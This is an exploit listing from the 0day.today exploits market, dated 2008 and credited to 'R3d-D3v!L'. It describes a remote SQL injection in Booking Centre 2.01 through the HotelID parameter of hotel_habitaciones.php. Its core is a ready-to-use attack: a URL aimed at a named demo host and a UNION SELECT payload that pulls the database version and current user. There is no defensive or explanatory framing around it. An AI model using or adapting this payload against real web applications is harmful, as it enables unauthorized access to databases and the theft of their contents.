[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Booking Centre 2.01 (HotelID) Remote SQL Injection Vulnerability

Author
R3d-D3v!L
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4278
Category
web applications
Date add
27-11-2008
Platform
unsorted
================================================================
Booking Centre 2.01 (HotelID) Remote SQL Injection Vulnerability
================================================================


 [~] ----------------------------------------------------------
 [~]Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
  
 [~]Vendor: www.bookingcentre.eu
  
 [~]Software: Hotels Group
  
 [~] Date: 28.11.2008 
  
 [~] Home: www.ahacker.biz 
  
 [~] contact: N/A 
 [~] ----------------------------------------------------------- 
  

 [~] Exploit: 

 http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL)


 [~] (SQL): 

 1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
  
 [~]-------------------------------------------------------------------------------- 




#  0day.today [2024-11-16]  #